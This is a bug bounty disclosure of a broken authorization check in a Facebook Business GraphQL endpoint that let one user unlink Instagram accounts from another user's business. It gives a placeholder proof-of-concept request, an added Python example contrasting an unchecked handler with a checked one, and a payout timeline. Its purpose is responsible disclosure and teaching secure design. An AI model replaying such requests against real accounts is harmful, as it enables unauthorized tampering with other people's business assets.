Description
There exists a GraphQL endpoint which allowed me to unlink the Instagram accounts linked to an FB business.
Impact
A malicious user can unlink the Instagram accounts that are linked to the FB business of other users.
Proof of Concept
POST
business.facebook.com/api/graphql/
variables={"businessID":"[BUSINESS_ID]","instagramAccountID":"[INSTAGRAM_V2_ID]"}&doc_id=REDACTED
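The following is an added example, not part of the original report and not Meta's code. It assumes the issue was a missing server-side authorization check on the `businessID` and `instagramAccountID` variables (the report does not state the root cause) and contrasts an unchecked unlink handler with a checked one; all function names, IDs and users are hypothetical.

```python
# Constructed sample data: every ID and user name here is hypothetical.
def fresh_state():
    return {
        "admins": {"biz_100": {"alice"}, "biz_200": {"mallory"}},
        "ig_links": {"biz_100": {"ig_1"}, "biz_200": {"ig_2"}},
    }


class Forbidden(Exception):
    """Raised when the caller may not act on the requested objects."""


def unlink_unchecked(state, caller, business_id, instagram_account_id):
    # Weak form: trusts businessID / instagramAccountID from the request
    # variables and never relates them to the authenticated caller.
    state["ig_links"].get(business_id, set()).discard(instagram_account_id)
    return True


def unlink_checked(state, caller, business_id, instagram_account_id):
    # 1. The caller must hold an admin role on the business named in the request.
    if caller not in state["admins"].get(business_id, set()):
        raise Forbidden("caller does not administer this business")
    # 2. The Instagram account must actually be linked to that same business,
    #    so a caller cannot pair their own business ID with a foreign account ID.
    links = state["ig_links"].get(business_id, set())
    if instagram_account_id not in links:
        raise Forbidden("account is not linked to this business")
    links.remove(instagram_account_id)
    return True


def demo():
    results = {}
    s = fresh_state()
    unlink_unchecked(s, "mallory", "biz_100", "ig_1")
    results["unchecked_victim_links"] = sorted(s["ig_links"]["biz_100"])
    s = fresh_state()
    for biz, ig in (("biz_100", "ig_1"), ("biz_200", "ig_1")):
        try:
            unlink_checked(s, "mallory", biz, ig)
        except Forbidden as exc:
            results[(biz, ig)] = str(exc)
    results["checked_victim_links"] = sorted(s["ig_links"]["biz_100"])
    results["owner_ok"] = unlink_checked(s, "alice", "biz_100", "ig_1")
    return results
```

Both checks are needed: the role check alone would still let a caller name their own business alongside another business's Instagram account ID.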
Timeline
05 May 2022 - Report sent
17 May 2022 - Triaged
08 July 2022 - $2000 Bounty rewarded by Meta